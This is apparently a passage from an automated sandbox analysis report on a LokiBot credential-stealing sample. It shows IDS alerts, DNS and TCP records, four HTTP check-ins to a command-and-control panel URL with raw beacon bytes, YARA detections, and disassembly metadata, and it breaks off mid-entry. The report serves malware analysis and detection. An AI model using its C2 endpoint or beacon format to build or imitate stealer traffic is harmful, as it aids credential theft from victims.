          11/20/21-21:37:06.967168TCP2025381ET TROJAN LokiBot Checkin4974480192.168.2.3216.239.34.21
          11/20/21-21:37:06.967168TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974480192.168.2.3216.239.34.21

          Network Port Distribution

          TCP Packets

          TimestampSource PortDest PortSource IPDest IP
          Nov 20, 2021 21:37:03.248497009 CET4974180192.168.2.3216.239.36.21
          Nov 20, 2021 21:37:03.274408102 CET8049741216.239.36.21192.168.2.3
          Nov 20, 2021 21:37:03.275115013 CET4974180192.168.2.3216.239.36.21
          Nov 20, 2021 21:37:03.277832985 CET4974180192.168.2.3216.239.36.21
          Nov 20, 2021 21:37:03.303780079 CET8049741216.239.36.21192.168.2.3
          Nov 20, 2021 21:37:03.303878069 CET4974180192.168.2.3216.239.36.21
          Nov 20, 2021 21:37:03.329621077 CET8049741216.239.36.21192.168.2.3
          Nov 20, 2021 21:37:03.337706089 CET8049741216.239.36.21192.168.2.3
          Nov 20, 2021 21:37:03.337750912 CET8049741216.239.36.21192.168.2.3
          Nov 20, 2021 21:37:03.337831020 CET4974180192.168.2.3216.239.36.21
          Nov 20, 2021 21:37:03.337902069 CET4974180192.168.2.3216.239.36.21
          Nov 20, 2021 21:37:03.646559000 CET4974180192.168.2.3216.239.36.21
          Nov 20, 2021 21:37:03.672894001 CET8049741216.239.36.21192.168.2.3
          Nov 20, 2021 21:37:04.600872040 CET4974280192.168.2.3216.239.34.21
          Nov 20, 2021 21:37:04.620438099 CET8049742216.239.34.21192.168.2.3
          Nov 20, 2021 21:37:04.620603085 CET4974280192.168.2.3216.239.34.21
          Nov 20, 2021 21:37:04.623197079 CET4974280192.168.2.3216.239.34.21
          Nov 20, 2021 21:37:04.642554998 CET8049742216.239.34.21192.168.2.3
          Nov 20, 2021 21:37:04.642651081 CET4974280192.168.2.3216.239.34.21
          Nov 20, 2021 21:37:04.662858009 CET8049742216.239.34.21192.168.2.3
          Nov 20, 2021 21:37:04.670073986 CET8049742216.239.34.21192.168.2.3
          Nov 20, 2021 21:37:04.670263052 CET4974280192.168.2.3216.239.34.21
          Nov 20, 2021 21:37:04.670502901 CET8049742216.239.34.21192.168.2.3
          Nov 20, 2021 21:37:04.670558929 CET4974280192.168.2.3216.239.34.21
          Nov 20, 2021 21:37:04.691240072 CET8049742216.239.34.21192.168.2.3
          Nov 20, 2021 21:37:05.831028938 CET4974380192.168.2.3216.239.36.21
          Nov 20, 2021 21:37:05.856354952 CET8049743216.239.36.21192.168.2.3
          Nov 20, 2021 21:37:05.856487989 CET4974380192.168.2.3216.239.36.21
          Nov 20, 2021 21:37:05.859359026 CET4974380192.168.2.3216.239.36.21
          Nov 20, 2021 21:37:05.884496927 CET8049743216.239.36.21192.168.2.3
          Nov 20, 2021 21:37:05.884594917 CET4974380192.168.2.3216.239.36.21
          Nov 20, 2021 21:37:05.909878969 CET8049743216.239.36.21192.168.2.3
          Nov 20, 2021 21:37:05.926323891 CET8049743216.239.36.21192.168.2.3
          Nov 20, 2021 21:37:05.926368952 CET8049743216.239.36.21192.168.2.3
          Nov 20, 2021 21:37:05.926462889 CET4974380192.168.2.3216.239.36.21
          Nov 20, 2021 21:37:05.926676989 CET4974380192.168.2.3216.239.36.21
          Nov 20, 2021 21:37:05.951792002 CET8049743216.239.36.21192.168.2.3
          Nov 20, 2021 21:37:06.937807083 CET4974480192.168.2.3216.239.34.21
          Nov 20, 2021 21:37:06.961808920 CET8049744216.239.34.21192.168.2.3
          Nov 20, 2021 21:37:06.964364052 CET4974480192.168.2.3216.239.34.21
          Nov 20, 2021 21:37:06.967168093 CET4974480192.168.2.3216.239.34.21
          Nov 20, 2021 21:37:06.990865946 CET8049744216.239.34.21192.168.2.3
          Nov 20, 2021 21:37:06.992532015 CET4974480192.168.2.3216.239.34.21
          Nov 20, 2021 21:37:07.018135071 CET8049744216.239.34.21192.168.2.3
          Nov 20, 2021 21:37:07.026791096 CET8049744216.239.34.21192.168.2.3
          Nov 20, 2021 21:37:07.026839972 CET8049744216.239.34.21192.168.2.3
          Nov 20, 2021 21:37:07.026916981 CET4974480192.168.2.3216.239.34.21
          Nov 20, 2021 21:37:07.026958942 CET4974480192.168.2.3216.239.34.21
          Nov 20, 2021 21:37:07.334486008 CET4974480192.168.2.3216.239.34.21
          Nov 20, 2021 21:37:07.360106945 CET8049744216.239.34.21192.168.2.3

          UDP Packets

          TimestampSource PortDest PortSource IPDest IP
          Nov 20, 2021 21:37:03.204025030 CET5804553192.168.2.38.8.8.8
          Nov 20, 2021 21:37:03.237479925 CET53580458.8.8.8192.168.2.3
          Nov 20, 2021 21:37:04.514970064 CET5745953192.168.2.38.8.8.8
          Nov 20, 2021 21:37:04.598186970 CET53574598.8.8.8192.168.2.3
          Nov 20, 2021 21:37:05.809151888 CET5787553192.168.2.38.8.8.8
          Nov 20, 2021 21:37:05.829185009 CET53578758.8.8.8192.168.2.3
          Nov 20, 2021 21:37:06.913052082 CET5415453192.168.2.38.8.8.8
          Nov 20, 2021 21:37:06.932966948 CET53541548.8.8.8192.168.2.3

          DNS Queries

          TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
          Nov 20, 2021 21:37:03.204025030 CET192.168.2.38.8.8.80x65c0Standard query (0)publicspeaking.co.idA (IP address)IN (0x0001)
          Nov 20, 2021 21:37:04.514970064 CET192.168.2.38.8.8.80xece0Standard query (0)publicspeaking.co.idA (IP address)IN (0x0001)
          Nov 20, 2021 21:37:05.809151888 CET192.168.2.38.8.8.80xf600Standard query (0)publicspeaking.co.idA (IP address)IN (0x0001)
          Nov 20, 2021 21:37:06.913052082 CET192.168.2.38.8.8.80xa232Standard query (0)publicspeaking.co.idA (IP address)IN (0x0001)

          DNS Answers

          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
          Nov 20, 2021 21:37:03.237479925 CET8.8.8.8192.168.2.30x65c0No error (0)publicspeaking.co.id216.239.36.21A (IP address)IN (0x0001)
          Nov 20, 2021 21:37:03.237479925 CET8.8.8.8192.168.2.30x65c0No error (0)publicspeaking.co.id216.239.38.21A (IP address)IN (0x0001)
          Nov 20, 2021 21:37:03.237479925 CET8.8.8.8192.168.2.30x65c0No error (0)publicspeaking.co.id216.239.32.21A (IP address)IN (0x0001)
          Nov 20, 2021 21:37:03.237479925 CET8.8.8.8192.168.2.30x65c0No error (0)publicspeaking.co.id216.239.34.21A (IP address)IN (0x0001)
          Nov 20, 2021 21:37:04.598186970 CET8.8.8.8192.168.2.30xece0No error (0)publicspeaking.co.id216.239.34.21A (IP address)IN (0x0001)
          Nov 20, 2021 21:37:04.598186970 CET8.8.8.8192.168.2.30xece0No error (0)publicspeaking.co.id216.239.38.21A (IP address)IN (0x0001)
          Nov 20, 2021 21:37:04.598186970 CET8.8.8.8192.168.2.30xece0No error (0)publicspeaking.co.id216.239.32.21A (IP address)IN (0x0001)
          Nov 20, 2021 21:37:04.598186970 CET8.8.8.8192.168.2.30xece0No error (0)publicspeaking.co.id216.239.36.21A (IP address)IN (0x0001)
          Nov 20, 2021 21:37:05.829185009 CET8.8.8.8192.168.2.30xf600No error (0)publicspeaking.co.id216.239.36.21A (IP address)IN (0x0001)
          Nov 20, 2021 21:37:05.829185009 CET8.8.8.8192.168.2.30xf600No error (0)publicspeaking.co.id216.239.38.21A (IP address)IN (0x0001)
          Nov 20, 2021 21:37:05.829185009 CET8.8.8.8192.168.2.30xf600No error (0)publicspeaking.co.id216.239.32.21A (IP address)IN (0x0001)
          Nov 20, 2021 21:37:05.829185009 CET8.8.8.8192.168.2.30xf600No error (0)publicspeaking.co.id216.239.34.21A (IP address)IN (0x0001)
          Nov 20, 2021 21:37:06.932966948 CET8.8.8.8192.168.2.30xa232No error (0)publicspeaking.co.id216.239.34.21A (IP address)IN (0x0001)
          Nov 20, 2021 21:37:06.932966948 CET8.8.8.8192.168.2.30xa232No error (0)publicspeaking.co.id216.239.38.21A (IP address)IN (0x0001)
          Nov 20, 2021 21:37:06.932966948 CET8.8.8.8192.168.2.30xa232No error (0)publicspeaking.co.id216.239.32.21A (IP address)IN (0x0001)
          Nov 20, 2021 21:37:06.932966948 CET8.8.8.8192.168.2.30xa232No error (0)publicspeaking.co.id216.239.36.21A (IP address)IN (0x0001)

          HTTP Request Dependency Graph

          • publicspeaking.co.id

          HTTP Packets

          Session IDSource IPSource PortDestination IPDestination PortProcess
          0192.168.2.349741216.239.36.2180C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
          TimestampkBytes transferredDirectionData
          Nov 20, 2021 21:37:03.277832985 CET1229OUTPOST /seun/Panel/five/fre.php HTTP/1.0
          User-Agent: Mozilla/4.08 (Charon; Inferno)
          Host: publicspeaking.co.id
          Accept: */*
          Content-Type: application/octet-stream
          Content-Encoding: binary
          Content-Key: F3A57278
          Content-Length: 190
          Connection: close
          Nov 20, 2021 21:37:03.303878069 CET1229OUTData Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 37 00 32 00 31 00 36 00 38 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
          Data Ascii: 'ckav.ruhardz721680DESKTOP-716T771k08F9C4E9C79A3B52B3F7394302zUgQ
          Nov 20, 2021 21:37:03.337706089 CET1229INHTTP/1.0 301 Moved Permanently
          Location: http://www.publicspeaking.co.id/seun/Panel/five/fre.php
          Date: Sat, 20 Nov 2021 20:37:03 GMT
          Content-Type: text/html; charset=UTF-8
          Server: ghs
          Content-Length: 252
          X-XSS-Protection: 0
          X-Frame-Options: SAMEORIGIN
          Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 70 75 62 6c 69 63 73 70 65 61 6b 69 6e 67 2e 63 6f 2e 69 64 2f 73 65 75 6e 2f 50 61 6e 65 6c 2f 66 69 76 65 2f 66 72 65 2e 70 68 70 22 3e 68 65 72 65 3c 2f 41 3e 2e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
          Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>301 Moved</TITLE></HEAD><BODY><H1>301 Moved</H1>The document has moved<A HREF="http://www.publicspeaking.co.id/seun/Panel/five/fre.php">here</A>.</BODY></HTML>


          Session IDSource IPSource PortDestination IPDestination PortProcess
          1192.168.2.349742216.239.34.2180C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
          TimestampkBytes transferredDirectionData
          Nov 20, 2021 21:37:04.623197079 CET1230OUTPOST /seun/Panel/five/fre.php HTTP/1.0
          User-Agent: Mozilla/4.08 (Charon; Inferno)
          Host: publicspeaking.co.id
          Accept: */*
          Content-Type: application/octet-stream
          Content-Encoding: binary
          Content-Key: F3A57278
          Content-Length: 190
          Connection: close
          Nov 20, 2021 21:37:04.642651081 CET1231OUTData Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 37 00 32 00 31 00 36 00 38 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
          Data Ascii: 'ckav.ruhardz721680DESKTOP-716T771+08F9C4E9C79A3B52B3F739430tTSS2
          Nov 20, 2021 21:37:04.670073986 CET1231INHTTP/1.0 301 Moved Permanently
          Location: http://www.publicspeaking.co.id/seun/Panel/five/fre.php
          Date: Sat, 20 Nov 2021 20:37:04 GMT
          Content-Type: text/html; charset=UTF-8
          Server: ghs
          Content-Length: 252
          X-XSS-Protection: 0
          X-Frame-Options: SAMEORIGIN
          Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 70 75 62 6c 69 63 73 70 65 61 6b 69 6e 67 2e 63 6f 2e 69 64 2f 73 65 75 6e 2f 50 61 6e 65 6c 2f 66 69 76 65 2f 66 72 65 2e 70 68 70 22 3e 68 65 72 65 3c 2f 41 3e 2e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
          Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>301 Moved</TITLE></HEAD><BODY><H1>301 Moved</H1>The document has moved<A HREF="http://www.publicspeaking.co.id/seun/Panel/five/fre.php">here</A>.</BODY></HTML>


          Session IDSource IPSource PortDestination IPDestination PortProcess
          2192.168.2.349743216.239.36.2180C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
          TimestampkBytes transferredDirectionData
          Nov 20, 2021 21:37:05.859359026 CET1232OUTPOST /seun/Panel/five/fre.php HTTP/1.0
          User-Agent: Mozilla/4.08 (Charon; Inferno)
          Host: publicspeaking.co.id
          Accept: */*
          Content-Type: application/octet-stream
          Content-Encoding: binary
          Content-Key: F3A57278
          Content-Length: 163
          Connection: close
          Nov 20, 2021 21:37:05.884594917 CET1233OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 37 00 32 00 31 00 36 00 38 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
          Data Ascii: (ckav.ruhardz721680DESKTOP-716T77108F9C4E9C79A3B52B3F739430
          Nov 20, 2021 21:37:05.926323891 CET1233INHTTP/1.0 301 Moved Permanently
          Location: http://www.publicspeaking.co.id/seun/Panel/five/fre.php
          Date: Sat, 20 Nov 2021 20:37:05 GMT
          Content-Type: text/html; charset=UTF-8
          Server: ghs
          Content-Length: 252
          X-XSS-Protection: 0
          X-Frame-Options: SAMEORIGIN
          Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 70 75 62 6c 69 63 73 70 65 61 6b 69 6e 67 2e 63 6f 2e 69 64 2f 73 65 75 6e 2f 50 61 6e 65 6c 2f 66 69 76 65 2f 66 72 65 2e 70 68 70 22 3e 68 65 72 65 3c 2f 41 3e 2e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
          Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>301 Moved</TITLE></HEAD><BODY><H1>301 Moved</H1>The document has moved<A HREF="http://www.publicspeaking.co.id/seun/Panel/five/fre.php">here</A>.</BODY></HTML>


          Session IDSource IPSource PortDestination IPDestination PortProcess
          3192.168.2.349744216.239.34.2180C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
          TimestampkBytes transferredDirectionData
          Nov 20, 2021 21:37:06.967168093 CET1234OUTPOST /seun/Panel/five/fre.php HTTP/1.0
          User-Agent: Mozilla/4.08 (Charon; Inferno)
          Host: publicspeaking.co.id
          Accept: */*
          Content-Type: application/octet-stream
          Content-Encoding: binary
          Content-Key: F3A57278
          Content-Length: 163
          Connection: close
          Nov 20, 2021 21:37:06.992532015 CET1234OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 37 00 32 00 31 00 36 00 38 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
          Data Ascii: (ckav.ruhardz721680DESKTOP-716T77108F9C4E9C79A3B52B3F739430
          Nov 20, 2021 21:37:07.026791096 CET1235INHTTP/1.0 301 Moved Permanently
          Location: http://www.publicspeaking.co.id/seun/Panel/five/fre.php
          Date: Sat, 20 Nov 2021 20:37:07 GMT
          Content-Type: text/html; charset=UTF-8
          Server: ghs
          Content-Length: 252
          X-XSS-Protection: 0
          X-Frame-Options: SAMEORIGIN
          Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 70 75 62 6c 69 63 73 70 65 61 6b 69 6e 67 2e 63 6f 2e 69 64 2f 73 65 75 6e 2f 50 61 6e 65 6c 2f 66 69 76 65 2f 66 72 65 2e 70 68 70 22 3e 68 65 72 65 3c 2f 41 3e 2e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
          Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>301 Moved</TITLE></HEAD><BODY><H1>301 Moved</H1>The document has moved<A HREF="http://www.publicspeaking.co.id/seun/Panel/five/fre.php">here</A>.</BODY></HTML>


          Code Manipulations

          Statistics

          CPU Usage

          Click to jump to process

          Memory Usage

          Click to jump to process

          High Level Behavior Distribution

          Click to dive into process behavior distribution

          Behavior

          Click to jump to process

          System Behavior

          General

          Start time:21:36:56
          Start date:20/11/2021
          Path:C:\Users\user\Desktop\FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exe
          Wow64 process (32bit):false
          Commandline:"C:\Users\user\Desktop\FADAE8A98643B8305B18D587F3CC16534EACD884E8475.exe"
          Imagebase:0xd70000
          File size:359690 bytes
          MD5 hash:2AE5473D26A235B7AB3EE2D632514D60
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:.Net C# or VB.NET
          Yara matches:
          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.278368421.000000001320B000.00000004.00000001.sdmp, Author: Joe Security
          • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000001.00000002.278368421.000000001320B000.00000004.00000001.sdmp, Author: Joe Security
          • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000001.00000002.278368421.000000001320B000.00000004.00000001.sdmp, Author: Joe Security
          • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000001.00000002.278368421.000000001320B000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.278098353.0000000003141000.00000004.00000001.sdmp, Author: Joe Security
          • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000001.00000002.278098353.0000000003141000.00000004.00000001.sdmp, Author: Joe Security
          • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000001.00000002.278098353.0000000003141000.00000004.00000001.sdmp, Author: Joe Security
          • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000001.00000002.278098353.0000000003141000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
          Reputation:low

          General

          Start time:21:36:58
          Start date:20/11/2021
          Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
          Wow64 process (32bit):true
          Commandline:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
          Imagebase:0x400000
          File size:1171592 bytes
          MD5 hash:C63ED21D5706A527419C9FBD730FFB2E
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Yara matches:
          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000000.276478671.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
          • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000004.00000000.276478671.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
          • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000004.00000000.276478671.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
          • Rule: Loki_1, Description: Loki Payload, Source: 00000004.00000000.276478671.0000000000400000.00000040.00000001.sdmp, Author: kevoreilly
          • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000004.00000000.276478671.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.291082307.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
          • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000004.00000002.291082307.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
          • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000004.00000002.291082307.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
          • Rule: Loki_1, Description: Loki Payload, Source: 00000004.00000002.291082307.0000000000400000.00000040.00000001.sdmp, Author: kevoreilly
          • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000004.00000002.291082307.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000000.276871615.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
          • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000004.00000000.276871615.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
          • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000004.00000000.276871615.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
          • Rule: Loki_1, Description: Loki Payload, Source: 00000004.00000000.276871615.0000000000400000.00000040.00000001.sdmp, Author: kevoreilly
          • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000004.00000000.276871615.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000000.276149885.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
          • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000004.00000000.276149885.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
          • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000004.00000000.276149885.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
          • Rule: Loki_1, Description: Loki Payload, Source: 00000004.00000000.276149885.0000000000400000.00000040.00000001.sdmp, Author: kevoreilly
          • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000004.00000000.276149885.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000000.277192083.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
          • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000004.00000000.277192083.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
          • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000004.00000000.277192083.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
          • Rule: Loki_1, Description: Loki Payload, Source: 00000004.00000000.277192083.0000000000400000.00000040.00000001.sdmp, Author: kevoreilly
          • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000004.00000000.277192083.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
          Reputation:high

          Disassembly

          Code Analysis

          Reset < >

            Executed Functions

            Strings
            Memory Dump Source
            • Source File: 00000001.00000002.278711312.00007FFC08DD0000.00000040.00000001.sdmp, Offset: 00007FFC08DD0000, based on PE: false
            Similarity
            • API ID:
            • String ID: ?a_^$x\Fg
            • API String ID: 0-1648394570
            • Opcode ID: ec991fc5207a13d795de95636ceebcdab2d0c75b70932ba369f05d0d45ad07ca
            • Instruction ID: 6518cfbea6743ee2a6ac831910c73c71797febe8cae3a816649a16e79896f153
            • Opcode Fuzzy Hash: ec991fc5207a13d795de95636ceebcdab2d0c75b70932ba369f05d0d45ad07ca
            • Instruction Fuzzy Hash: 10122A62A0CB6E4BEB68A62C54591F977E1EFC6320F14427BD08DC71D3DD186C4BC2A9
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            Memory Dump Source
            • Source File: 00000001.00000002.278711312.00007FFC08DD0000.00000040.00000001.sdmp, Offset: 00007FFC08DD0000, based on PE: false
            Similarity
            • API ID: SectionUnmapView
            • String ID:
            • API String ID: 498011366-0
            • Opcode ID: 04515bdf9e4ddae536d4292cdf2a00cbf7d6f8ddd2819073419b702679ef0a4d
            • Instruction ID: 9af34ccfd08596bd43bad8178157962fd42a679a5748e04723cd8a449094e6c5
            • Opcode Fuzzy Hash: 04515bdf9e4ddae536d4292cdf2a00cbf7d6f8ddd2819073419b702679ef0a4d
            • Instruction Fuzzy Hash: A031093190CB5C4FDB29EB68984A6F97BE0EF56321F04427FD08ED3192DA746406C755
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000001.00000002.278711312.00007FFC08DD0000.00000040.00000001.sdmp, Offset: 00007FFC08DD0000, based on PE: false
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 12954afe1db1c9b3f15cc875bd5bde4331a07b67e9ff0ea02c29aa8995014482
            • Instruction ID: 0379296c36b1ef52eb75dc3921c59fb31116c692e927b0506e455a5ef4214b48
            • Opcode Fuzzy Hash: 12954afe1db1c9b3f15cc875bd5bde4331a07b67e9ff0ea02c29aa8995014482
            • Instruction Fuzzy Hash: 4AB15A31A0875E8FEF9CDF288855AB977E1EF48305F04427AD44AD32E1DE24A846C756
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            Memory Dump Source
            • Source File: 00000001.00000002.278711312.00007FFC08DD0000.00000040.00000001.sdmp, Offset: 00007FFC08DD0000, based on PE: false
            Similarity
            • API ID: CreateProcess
            • String ID:
            • API String ID: 963392458-0
            • Opcode ID: 988fb8f58ee41a5a0a6b092314c0094d641ec98d57bd707385d23e5ea57ea5f4
            • Instruction ID: cde032c01bb0146c19d6b851ff42ae2060fb67335a41cabc2950ac7752efda36
            • Opcode Fuzzy Hash: 988fb8f58ee41a5a0a6b092314c0094d641ec98d57bd707385d23e5ea57ea5f4
            • Instruction Fuzzy Hash: 4DE1C330918B8D8FEB68DF28DC467E977E1FB59310F04422AD84DC7291DE74A946CB92
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            Memory Dump Source
            • Source File: 00000001.00000002.278711312.00007FFC08DD0000.00000040.00000001.sdmp, Offset: 00007FFC08DD0000, based on PE: false
            Similarity
            • API ID: MemoryProcessWrite
            • String ID:
            • API String ID: 3559483778-0
            • Opcode ID: 367c6bdffe8aeb4f2b1429531e32a76fba011c9cc4d2059eaeac76ae7e5d4d93
            • Instruction ID: 032415dd362ee4366a54c9a5af4dd0ae3d6c94d7375a57ff7ded115ed8807a30
